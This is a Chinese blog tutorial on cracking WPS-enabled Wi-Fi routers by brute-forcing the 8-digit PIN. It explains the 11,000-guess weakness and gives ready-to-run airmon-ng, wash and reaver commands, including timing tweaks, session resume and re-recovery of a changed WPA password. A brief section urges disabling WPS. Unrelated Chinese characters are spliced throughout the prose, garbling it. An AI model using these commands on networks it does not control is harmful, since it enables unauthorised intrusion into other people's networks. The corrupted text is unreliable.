最近項(xiàng)目有點(diǎn)緊专缠,所以本應(yīng)該上周發(fā)的文章,拖到了本周三顽频,在此說聲抱歉藤肢。無線安全專題,我打算系統(tǒng)地寫六個(gè)部分糯景,分別為破解篇嘁圈,攻擊篇省骂,欺騙篇,路由篇最住,移動(dòng)篇和藍(lán)牙篇钞澳,當(dāng)然在發(fā)布的過程中,可能還會摻雜著發(fā)布flask的教程涨缚,分享我的個(gè)人博客框架轧粟。(我的新書《Python爬蟲開發(fā)與項(xiàng)目實(shí)戰(zhàn)》發(fā)布了,大家在這里可以看到樣章)
上一篇咱們說到了破解篇的第一課:kali破解WPA,今天我們要說的是通過破解pin碼,來獲取開啟wps功能的wifi密碼脓魏。
路由器開啟wps功能后兰吟,會隨機(jī)生成一個(gè)8位的pin碼,通過暴力枚舉pin碼茂翔,達(dá)到破解的目的混蔼,尤其現(xiàn)在很多路由器默認(rèn)開啟了wps功能。大家可能會想到8位的隨機(jī)pin碼將會有100000000
種情況珊燎,這要pin到何年何月呀惭嚣。。悔政。晚吞。。谋国。不過接下來講解一下原理槽地,大家會發(fā)現(xiàn)其實(shí)沒多少種情況,這也是這種攻擊方式比較流行的原因烹卒。
<h3>1.pin碼破解的原理:</h3>
pin碼是由8位純數(shù)字組成的識別碼闷盔,pin碼破解是分三部分進(jìn)行的,規(guī)律是這樣的:pin碼分為三部分旅急,如圖:
前4位為第一部分逢勾,第5-7位為第二部分,最后1位為第三部分藐吮。第一部分的驗(yàn)證跟第二部分沒關(guān)聯(lián)溺拱,最后1位是根據(jù)第二部分計(jì)算得出的校驗(yàn)碼。
破解一開始是先單獨(dú)對第一部分進(jìn)行pin碼匹配谣辞,也就是說先破解前4位pin碼迫摔。前4位是0000-9999總共10000個(gè)組合。
當(dāng)前4位pin碼確定后再對第二部分進(jìn)行pin碼匹配泥从,也就是再對5-7位進(jìn)行破解句占,5-7位是000-999總共1000個(gè)組合。
當(dāng)前7位都確定后躯嫉,最后1位也會自動(dòng)得出纱烘,破解完成杨拐。
根據(jù)pin碼破解的原理,可以看到只需要枚舉11000種情況就會必然破解出pin碼擂啥,從而通過pin得到wifi密碼哄陶。
<h3>2.PIN碼爆破:</h3>
講解明白原理,接下來開始使用工具爆破pin碼哺壶,無線專題我們都是基于kali2.0的操作系統(tǒng)屋吨,無線網(wǎng)卡采用的是WN722N。
爆破pin碼的前提是路由器開啟了WPS功能山宾,首先咱們要做的是發(fā)現(xiàn)發(fā)現(xiàn)開啟WPS功能的wifi至扰。
將網(wǎng)卡切換到監(jiān)聽模式: airmon-ng start wlan1,
如果監(jiān)聽模式切換失敗,請看第一篇的內(nèi)容资锰。
在命令行中輸入:wash -i wlan1,
掃描開啟wps的wifi設(shè)備渊胸。WPS Locked為No的都可以爆破試試。
找到了開啟WPS的wifi台妆,接下來咱們就可以進(jìn)行pin碼爆破,下面主要說一下reaver工具胖翰。
reaver 命令:
reaver -i mon0 -b mac -S -v
reaver命令參數(shù):
-i 監(jiān)聽后接口名稱
-b 目標(biāo)mac地址
-a 自動(dòng)檢測目標(biāo)AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 顯示更多的非嚴(yán)重警告
-d 即delay每窮舉一次的閑置時(shí)間 預(yù)設(shè)為1秒
-t 即timeout每次窮舉等待反饋的最長時(shí)間
-c 指定頻道可以方便找到信號接剩,如-c1 指定1頻道
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
應(yīng)因狀況調(diào)整參數(shù)(-c后面都已目標(biāo)頻道為1作為例子)
目標(biāo)信號非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目標(biāo)信號普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目標(biāo)信號一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
選擇之前掃描出來的開啟WPS的wifi,選擇一個(gè)進(jìn)行破解萨咳。
輸入:reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在窮舉的過程中懊缺,reaver會生成以路由mac地址為名的wpc文件,這個(gè)文件在kali系統(tǒng)中/etc/reaver/文件夾下。
一時(shí)半會pin不出來培他,過段時(shí)間pin的時(shí)候命令加參數(shù) -s file.wpc鹃两,就會根據(jù)之前的進(jìn)度繼續(xù)pin。
<h3> 3.注意點(diǎn):</h3>
1.一般reaver 前四位默認(rèn)是從0開始舀凛,如果想從指定的數(shù)值開始爆破需要添加-p參數(shù):-p 9000,這個(gè)意思就是從9000開始俊扳,只要不pin死路由器,可以多開幾個(gè)窗口猛遍,從不同的數(shù)值開始馋记。
2.最后pin完最后會顯示W(wǎng)PS PIN(正確的pin碼)和WPA PSK(wifi密碼),同時(shí)如果WPS功能沒關(guān)懊烤,pin碼沒修改梯醒,無論怎樣修改密碼,都可以通過pin碼獲取wifi密碼: reaver -i mon0 -b mac -p pin碼腌紧,來再次得到密碼
3.一般pin的過快茸习,會把路由器pin死,所以一般還會加上-d5 -t5參數(shù)壁肋,添加5秒延時(shí)号胚,當(dāng)然數(shù)值可以自己改籽慢。
<h3>4.防范措施:</h3>
1.WPS功能對個(gè)人基本上沒啥作用,還是關(guān)了吧涕刚。
2.現(xiàn)在的路由一般會有防pin措施嗡综,例如會有300秒pin限制,但這個(gè)是偽防pin,作用不是很大杜漠。它設(shè)置時(shí)間間隔极景,正好防止我們把路由器pin死。所以還是把WPS功能關(guān)了驾茴,不要過分相信防pin措施盼樟,畢竟只有11000種情況,早晚會破解锈至。
今天的分享就到這里晨缴,下一篇繼續(xù)分析。如果大家覺得還可以呀峡捡,記得推薦呦击碗。